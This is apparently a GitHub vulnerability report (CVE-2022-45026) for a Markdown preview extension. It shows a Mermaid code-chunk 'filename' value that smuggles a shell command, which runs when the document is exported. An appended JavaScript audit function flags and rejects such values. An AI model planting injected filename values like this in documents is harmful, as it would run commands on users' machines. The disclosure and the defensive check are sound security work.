shd101wyy / vscode-markdown-preview-enhanced

One of the "BEST" markdown preview extensions for Visual Studio Code
https://shd101wyy.github.io/markdown-preview-enhanced

[Vulnerability] Code execution via GitHub Flavored Markdown export #774

Open yuriisanin opened 1 year ago

yuriisanin commented 1 year ago

Video PoC for Atom on YouTube: PoC

Original issue: shd101wyy/mume, OS command injection via Mermaid PNG export

STR (please note that the following PoC works for OS X; it might be different for Linux or Windows):

  1. Create document with the following code inside.

         mermaid {filename="$(open -a Calculator)hello.pdf"}
         gitGraph
                commit id: "Normal"
                commit
                commit id: "Reverse" type: REVERSE
                commit
                commit id: "Highlight" type: HIGHLIGHT
                commit

  2. Open preview
  3. Use "Save as Markdown" button in the preview window
  4. Calculator program should appear on the screen.

yuriisanin commented 1 year ago

Assigned CVE-2022-45026
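
A defensive check for the issue reported above, as an added example that is not part of the original thread or the extension's code: it scans Markdown for code-chunk `filename` attributes, rejects any that are not a plain allow-listed file name, and builds an argument vector instead of a shell string. The function names, the allow-list and the renderer call are assumptions.

```javascript
// Added example, not the extension's code: audit code-chunk `filename` attributes.
// Allow-list: plain base name, [A-Za-z0-9._-] only, one known export extension.
const SAFE_NAME = /^[A-Za-z0-9][A-Za-z0-9._-]{0,99}\.(png|svg|pdf)$/;
// Fence header carrying attributes in braces, as in the report's first line.
const FENCE_HEADER = /^\s*(?:`{3,}|~{3,})\s*[\w-]*\s*\{([^}]*)\}\s*$/;
const FILENAME_ATTR = /(?:^|\s)filename\s*=\s*(?:"([^"]*)"|'([^']*)'|(\S+))/;

function isSafeFilename(name) {
  return SAFE_NAME.test(name) && !name.includes("..");
}

// Returns one finding per fence header that carries a filename attribute.
function auditMarkdown(text) {
  const findings = [];
  text.split(/\r?\n/).forEach((line, i) => {
    const header = FENCE_HEADER.exec(line);
    const attr = header && FILENAME_ATTR.exec(header[1]);
    if (!attr) return;
    const filename = attr[1] ?? attr[2] ?? attr[3];
    findings.push({ line: i + 1, filename, safe: isSafeFilename(filename) });
  });
  return findings;
}

// Hypothetical renderer call: returns an argv for child_process.execFile or
// spawn (no shell), so the name is never parsed as shell syntax.
function buildRenderArgv(renderer, inputPath, outDir, filename) {
  if (!isSafeFilename(filename)) {
    throw new Error(`rejected filename attribute: ${JSON.stringify(filename)}`);
  }
  return { file: renderer, args: [inputPath, `${outDir}/${filename}`] };
}

// Constructed sample: the attribute from the report plus a benign one.
const FENCE = "`".repeat(3);
const SAMPLE = [
  "# Constructed sample",
  FENCE + 'mermaid {filename="$(open -a Calculator)hello.pdf"}',
  "gitGraph",
  "  commit",
  FENCE,
  FENCE + 'mermaid {filename="graph.png"}',
  "gitGraph",
  "  commit",
  FENCE,
].join("\n");

for (const f of auditMarkdown(SAMPLE)) {
  console.log(`line ${f.line}: ${f.safe ? "ok" : "UNSAFE"} ${JSON.stringify(f.filename)}`);
}
```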